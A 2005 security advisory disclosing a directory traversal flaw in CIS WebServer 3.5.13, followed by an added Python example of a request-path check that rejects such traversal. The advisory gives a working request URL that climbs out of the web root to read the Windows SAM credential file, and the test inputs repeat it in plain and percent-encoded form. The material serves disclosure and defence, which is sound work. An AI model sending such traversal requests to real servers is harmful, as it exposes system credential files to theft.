CIS WebServer Directory Traversal Bug
-=[ x0n3-h4ck Italian Security Team ]=-
/*Advisories*\
/*
Application: CIS WebServer
Vendor's URL: www.cisindia.net
Version: 3.5.13
Platforms: Windows
Bug: Directory Traversal
Exploitation: Remote
Author: CorryL
corryl80@xxxxxxxxx
www.x0n3-h4ck.org
*\
{Description}
CIS WebServer is an easy-to-use HTTP server. A remote user can obtain files on
the system that are located outside of the web document directory.
{Bug}
http://victimhost/../../../windows/repair/sam
The ../ sequences climb out of the web document directory, so a remote user
succeeds in reading the SAM file of the system where CIS WebServer is running.
{Vendor Status}
20/02/2005 Vendor notification
21/02/2005 Vendor Response
25/02/2005 No patch release from vendor
25/02/2005 Public disclosure
{Fix}
Waiting for an official patch
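
The check whose absence produces this class of bug, as an added example (not
part of the original advisory and not CIS WebServer's code): the request path
is decoded, normalised and rejected if it would climb above the document root.
The helper name map_request and the document root C:\webroot are assumptions
made for illustration.

```python
import ntpath  # Windows path rules, importable on any platform
from urllib.parse import unquote


class TraversalError(ValueError):
    """The request target resolves outside the document root."""


def map_request(docroot: str, target: str) -> str:
    """Map an HTTP request target to a file path under docroot.

    Hypothetical helper: shows the check, not CIS WebServer's code.
    """
    # Drop query string and fragment, then decode percent-escapes once so
    # that %2e%2e%2f is examined as ../ (it is never decoded again later).
    path = unquote(target.split("?", 1)[0].split("#", 1)[0])
    # NUL truncates names in native APIs; ':' would allow drive letters
    # and NTFS alternate data streams.
    if "\x00" in path or ":" in path:
        raise TraversalError("illegal character in path")
    # Windows accepts both separators, so treat '\' exactly like '/'.
    segments = []
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not segments:  # would climb above the document root
                raise TraversalError("path escapes document root")
            segments.pop()
        elif seg != seg.rstrip(". "):
            # Win32 strips trailing dots and spaces, so '...' or '.. '
            # could alias another name after this check has run.
            raise TraversalError("ambiguous segment: %r" % seg)
        else:
            segments.append(seg)
    return ntpath.join(docroot, *segments)


if __name__ == "__main__":
    DOCROOT = r"C:\webroot"  # constructed sample value
    for t in ("/index.html", "/../../../windows/repair/sam",
              "/%2e%2e/%2e%2e/windows/repair/sam", "/docs/../index.html"):
        try:
            print(t, "->", map_request(DOCROOT, t))
        except TraversalError as exc:
            print(t, "-> rejected:", exc)
```

Reserved device names and symbolic links inside the document root are not
covered by this check and need separate handling.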